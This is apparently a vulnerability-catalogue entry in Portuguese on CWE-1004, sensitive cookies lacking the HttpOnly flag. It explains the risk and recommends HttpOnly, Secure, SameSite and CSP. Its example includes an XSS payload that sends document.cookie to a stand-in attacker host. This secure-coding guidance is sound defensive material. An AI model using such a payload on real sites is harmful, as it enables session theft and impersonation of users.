Fallos del tipo CWE-1004
42 resultadosCookie sensível sem flag HttpOnly
Quando um cookie (especialmente de autenticação ou sessão) é enviado sem a flag HttpOnly, código JavaScript rodando no navegador consegue acessá-lo via document.cookie. Um atacante que injeta script malicioso (XSS) rouba facilmente o token de sessão e impersona o usuário.
Um site de banco define Set-Cookie: sessionId=abc123 sem HttpOnly. Um XSS refletido injeta <script>fetch('https://atacante.com?cookie='+document.cookie)</script>, e a sessão é comprometida antes mesmo do usuário perceber.
Sempre defina a flag HttpOnly ao criar cookies de autenticação (Set-Cookie: sessionId=...; HttpOnly; Secure; SameSite=Strict). Isso bloqueia acesso via JavaScript e reduz drasticamente o risco de roubo por XSS. Também implemente validação de entrada e CSP para mitigar XSS em primeiro lugar.